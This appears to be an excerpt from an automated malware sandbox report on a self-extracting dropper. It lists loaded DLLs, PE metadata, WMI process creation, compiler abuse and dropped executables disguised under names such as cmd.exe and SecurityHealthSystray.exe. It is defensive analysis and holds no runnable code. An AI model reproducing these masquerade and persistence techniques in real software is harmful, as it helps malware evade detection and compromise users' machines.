                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: sspicli.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: mscoree.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: kernel.appcore.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: version.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: windows.storage.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: wldp.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: profapi.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: cryptsp.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: rsaenh.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: cryptbase.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: sspicli.dll
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: apphelp.dll
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: version.dll
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: wldp.dll
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: profapi.dll
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: sspicli.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: version.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: sspicli.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: mscoree.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: kernel.appcore.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: version.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: windows.storage.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: wldp.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: profapi.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: cryptsp.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: rsaenh.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: cryptbase.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: sspicli.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: version.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: sspicli.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: mscoree.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: kernel.appcore.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: version.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: windows.storage.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: wldp.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: profapi.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: cryptsp.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: rsaenh.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: cryptbase.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: sspicli.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: version.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: sspicli.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: mscoree.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: kernel.appcore.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: version.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: windows.storage.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: wldp.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: profapi.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: cryptsp.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: rsaenh.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: cryptbase.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                    Source: kJrNOFEGbQ.exeStatic file information: File size 4234106 > 1048576
                                    Source: kJrNOFEGbQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: kJrNOFEGbQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: kJrNOFEGbQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: kJrNOFEGbQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: kJrNOFEGbQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: kJrNOFEGbQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: kJrNOFEGbQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: kJrNOFEGbQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kJrNOFEGbQ.exe
                                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.pdb source: Mscommon.exe, 00000008.00000002.2004012692.00000000036BA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: kJrNOFEGbQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: kJrNOFEGbQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: kJrNOFEGbQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: kJrNOFEGbQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: kJrNOFEGbQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.cmdline"
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.cmdline"Jump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeFile created: C:\hyperComponentFontDhcp\__tmp_rar_sfx_access_check_5332125Jump to behavior
                                    Source: kJrNOFEGbQ.exeStatic PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_0037F640 push ecx; ret 0_2_0037F653
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_0037EB78 push eax; ret 0_2_0037EB96
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeCode function: 8_2_00007FFD9BD261CF push esp; retf 8_2_00007FFD9BD261D1
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeCode function: 8_2_00007FFD9BD235B5 push ds; retf 8_2_00007FFD9BD235BB
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeCode function: 8_2_00007FFD9C1B812C pushad ; retn 5EDDh8_2_00007FFD9C1B819D
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeCode function: 32_2_00007FFD9BB263C0 push ecx; ret 32_2_00007FFD9BB263EA
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeCode function: 32_2_00007FFD9BB26219 push eax; ret 32_2_00007FFD9BB2622A
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeCode function: 32_2_00007FFD9BB2647D push ecx; ret 32_2_00007FFD9BB2648A
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeCode function: 32_2_00007FFD9BAF53CC pushad ; retf 32_2_00007FFD9BAF53D2
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 38_2_00007FFD9BAC53CC pushad ; retf 38_2_00007FFD9BAC53D2
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 41_2_00007FFD9BAE53CC pushad ; retf 41_2_00007FFD9BAE53D2
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 44_2_00007FFD9BAE53CC pushad ; retf 44_2_00007FFD9BAE53D2

                                    Persistence and Installation Behavior

                                    barindex
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\oGeTRkCA.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\spksuybo.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\bhUNaLwZ.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\PIewODkQ.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\ProgramData\SoftwareDistribution\cmd.exeJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\RrReMzQm.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\CXEIeahW.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\sfNsKLIr.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\FrRytwYk.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\hJqUpVHL.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\wwCruhPB.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\AEzAQzJw.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\GTFZlGXP.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\XDtENRtz.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\JmTPAbOe.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\SzUnVzkJ.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\vwiBQQWj.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\lZeSZrOV.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\WmSvTfGg.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\zepZsevX.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\qVgkgWEP.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\jXskDIJa.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\BjUpXdep.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\KAZQIQEM.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\cNoChqRS.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\RCtfAzVO.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exeJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\iaQciIuf.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\TnEFcwnq.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\QCZpVjcx.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\NDzgjDBy.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\BpLaswaY.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\KVMxlGUc.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\iXYuZrQJ.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\WGSwrSeE.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\JVsHHpbK.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\dwWdpxyo.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\bZkuwcVU.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\RTAxOVPQ.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\LSnFHGjW.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\SIrnFmDG.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\fplMbujm.logJump to dropped file
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeFile created: C:\hyperComponentFontDhcp\Mscommon.exeJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\vIyiJTTD.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\gVlLDILN.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\ProgramData\SoftwareDistribution\cmd.exeJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\RCtfAzVO.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\SzUnVzkJ.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\KVMxlGUc.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\iaQciIuf.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\RTAxOVPQ.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\PIewODkQ.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\wwCruhPB.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\fplMbujm.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\WGSwrSeE.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\LSnFHGjW.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\BjUpXdep.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\jXskDIJa.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\JmTPAbOe.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\AEzAQzJw.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\qVgkgWEP.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\XDtENRtz.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\FrRytwYk.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\vIyiJTTD.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\lZeSZrOV.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\dwWdpxyo.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\SIrnFmDG.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\KAZQIQEM.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\sfNsKLIr.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\TnEFcwnq.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\hJqUpVHL.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\QCZpVjcx.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\GTFZlGXP.logJump to dropped file
